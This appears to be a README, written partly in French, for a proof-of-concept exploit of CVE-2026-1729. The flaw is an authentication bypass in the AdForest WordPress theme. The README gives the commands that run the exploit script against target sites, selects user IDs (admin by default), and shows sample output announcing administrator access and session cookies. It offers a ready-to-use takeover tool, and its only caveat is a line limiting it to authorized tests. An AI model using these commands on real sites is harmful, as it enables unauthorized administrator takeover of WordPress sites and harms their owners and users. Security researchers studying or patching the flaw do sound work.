
The AdForest theme for WordPress is vulnerable to authentication bypass in all versions including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in, including admin
Preuve de concept simple pour CVE-2026-1729 (PoC) - Vulnérabilité de contournement d'authentification dans le thème WordPress AdForest. Réalisé par f3ds cr3w est 2oo2 blog
requestspip install requests
python poc/exploit.py https://site-cible.com
python poc/exploit.py https://site-cible.com --user-id 2
# Exploiter l'admin par défaut (ID utilisateur 1)
python poc/exploit.py https://example.com
# Exploiter un compte utilisateur spécifique
python poc/exploit.py https://example.com --user-id 5
# Tester plusieurs cibles
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - Contournement d'authentification AdForest WordPress
=======================================================
ATTENTION : Pour tests autorisés uniquement !
=======================================================
[+] Cible : https://example.com
[+] ID utilisateur ciblé : 1
[+] Envoi de l'exploit vers : https://example.com/wp-admin/admin-ajax.php
[+] SUCCÈS ! Accès administrateur accordé
[+] URL admin : https://example.com/wp-admin/
[+] Cookies de session : {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Connecté en tant que : admin
🎯 Exploit terminé avec succès !
Vous avez maintenant un accès administrateur au site WordPress.
/wp-admin/Si l'exploit échoue :